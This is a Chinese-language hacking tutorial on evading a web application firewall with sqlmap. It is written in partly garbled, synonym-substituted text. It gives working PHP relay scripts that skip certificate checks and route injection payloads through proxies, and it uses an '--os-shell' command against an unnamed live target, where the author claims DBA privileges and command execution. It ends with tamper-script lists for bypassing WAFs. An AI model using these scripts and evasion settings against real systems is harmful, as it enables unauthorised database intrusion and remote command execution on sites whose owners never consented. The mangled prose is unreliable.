htmlzhongcharuphp技巧_Web安然实战sqlmap绕过WAF

文章目录 [+]

直策应用sqlmap跑创造涌现如下缺点：

python2 sqlmap.py -u "http://xxxx?&daxxtae=null¶me=xxxxxx" --batch --delay=1 --random-agent ___ __H__ ___ ___["]_____ ___ ___ {1.5.4.7#dev}|_ -| . [)] | .'| . ||___|_ ["]_|_|_|__,| _| |_|V... |_| http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[] starting @ 10:12:10 /2021-10-10/[10.12.10] [INFO] parsing HTTP request from '49'custom injection marking character ('') found in option '--data'. Do you want to process it? [Y/n/q]Y[10:12:10] [INFO] testing connection to the target URL[10:12:10] [CRITICAL] can't establish SSL connection

一看无法建立SSL连接，好不容易创造一个注入点，难道就这样放弃了吗？先百度一波，看看SSL证书事理，就用一张图来理解更直接明了。

htmlzhongcharuphp技巧_Web安然实战sqlmap绕过WAF

那么碰着这样的情形要怎么办呢？在sqlmap中没有绕过SSL证书的参数，思考了很永劫光，终于想起来原来貌似有一个中转注入。
这里要办理的第一个问题是有哪些脚本措辞能够在要求网址时忽略SSL证书，第二个问题是我还须要利用sqlmap中的payload，这两个都要知足，通过查询理解到PHP可以利用参数来忽略SSL证书，由于并不是搞开拓的，以是这里还是思考了很永劫光，先来理解一下中转注入的事理吧。

（图片来自网络侵删）

中转注入的事理

首先我们我们来剖析一下sqlmap中转注入的事理，如下图：

了让大家更加随意马虎解，先利用大略的脚本演示一遍，演示代码如下：

<?php$payload=base64_encode($_GET['x']);//对中转脚本吸收的参数进行base64编码echo $payload$urls="http://xxx/xxxx?q=1$payload";//对要求的网址拼接base64编码的字符串file_get_contents($urls);//要求目标网站echo $urls;?>

网上随便找寻一个后面有参数的网站，添加到$urls变量中，将上述代码放在本地做事器中，然后访问，可以看到成功要求到我们添加的网站

利用sqlmap跑一下,设置一下代理利用burp来抓包

python2 sqlmap.py -u "http://127.0.0.1/zhongzhuan.php?x=1" -v 3 --proxy=http://127.0.0.1:8080

成功看到各种payload

burp抓包的结果

<?phpset_time_limit(0); $id=$_GET["id"]; $id=str_replace(" ","//",$id); $id=str_replace("=","%3D",$id); //这些编码机制可以自己的需求设定，毕竟实战的环境变换多样$url = "http://xxxx?&daxxtae=null¶me=$id";echo $url;$ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$url"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); // https要求不验证证书curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);//https要求不验证hostscurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // 函数实行如果成功只将结果返回，不自动输出任何内容。如果失落败返回FALSEcurl_setopt($ch, CURLOPT_HEADER, 0);//如果你想把一个头包含在输出中，设置这个选项为一个非零值 $output = curl_exec($ch); curl_close($ch); print_r($output);?>

此时中转脚本已经写好了，用sqlmap跑，没想到呀，既然流量有限定，就算要求延迟调得很慢，还是直接将我的ip给封了，此时又是一个漫长的过程，又要连续思考了，在sqlmap中有代理设置参数，哈哈哈这都知道，但是试了试一试不可以，一贯思考呀，首先我们借助了中转脚本，先要求的是我们确当地做事器，你说外网的代理做事器直接访问我本地做事器这是一个不现实的问题，最紧张是我没有公网做事器，不然就好办了，以是现在须要思考两个问题，首先我要用到中转脚本过证书问题，还要能够利用代理，在PHP代码上利用代理池设置。
此时sqlmap先要求我们中转脚本（并没有用代理地址），中转脚本借助设置的代理地址去访问目标网页。
现在代码修正成了如下：

<?phpset_time_limit(0); $id=$_GET["id"]; $id=str_replace(" ","%20",$id); $id=str_replace("=","%3D",$id); $url = "http://xxxx?&daxxtae=null¶me=$id";echo $url;$ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$url"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_PROXY, 'proxy.xxxx.com'); //代理做事器地址curl_setopt($ch, CURLOPT_PROXYPORT, '8080'); //代理做事器端口$output = curl_exec($ch); curl_close($ch); print_r($output);?>

在利用sqlmap跑的时候最好先本地测试一下，经由了20多分钟的扫描终于算是出东西了

直接看一下能否写shell，搞个高危，运气便是这么好

python2 sqlmap.py -u "http://xxxx?&daxxtae=null¶m=xxx" --batch --delay=1 --random-agent --os-shell

成功拿到了dba权限

成功实行命令，不过是真的慢，可能是有防护软件缘故原由吧。

在这里问题又来了，假如post型注入又该怎么办呢？上面的脚本彷佛不在利用思考了很永劫光，但是也没有在实际中碰着，以是这里就想本地考试测验一次。

post型中转注入

在注入天书中有post型注入，随便选了一个11关卡，抓取less-11关的包，注入点在登录框这里。

注入点位

uname=admin&passwd=hhh&submit=Submit

布局中转脚本如下：

<?php$url = "http://192.168.1.104/sqli/Less-11/index.php";$sql = $_GET[s];//获取中转脚本传过来的payload $s = urlencode($sql);$params = "uname=admin$s&passwd=aa";$ch = curl_init();// 创建一个新cURL资源 curl_setopt($ch, CURLOPT_URL, $url);//这是你想用PHP取回的URL地址，可以在用curl_init()函数初始化时设置这个选项curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); // https要求不验证证书curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);//https要求不验证hostscurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // 函数实行如果成功只将结果返回，不自动输出任何内容。如果失落败返回FALSEcurl_setopt($ch, CURLOPT_HEADER, 0);//如果你想把一个头包含在输出中，设置这个选项为一个非零值 curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 5.01; Windows NT 5.0)');// 在HTTP要求中自定义一个”user-agent”头的字符串curl_setopt($ch, CURLOPT_TIMEOUT, 15);//为了应对目标做事器的过载，下线，或者崩溃等可能状况。 curl_setopt($ch, CURLOPT_POST, 1); // post 提交办法curl_setopt($ch, CURLOPT_POSTFIELDS, $params);// 抓取URL并把它通报给浏览器 $output = curl_exec($ch);// 关闭cURL资源，并且开释系统资源curl_close($ch);$a = strlen($output);//echo $a;if($a==2846){ echo "1";}else{ echo "2";}

利用sqlmap进行注入

首先注入我们的中转脚本

中转脚本通过获取的payload要求目标网站

成功跑出数据库

sqlmap绕过WAF的思路总结

1、设置要求头

--user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"

2、设置代理

--proxy=http://127.0.0.1:8080

3、设置延迟

--delay=1

4、利用--tamper参数中的编码脚本常见编码搭配办法普通tamper搭配办法:

tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

数据库为MSSQL的搭配办法:

tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

数据库为MySql的搭配办法:

tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

5、自己编写中转脚本

关注我，持续更新；

查看【网络安全学习资料·攻略】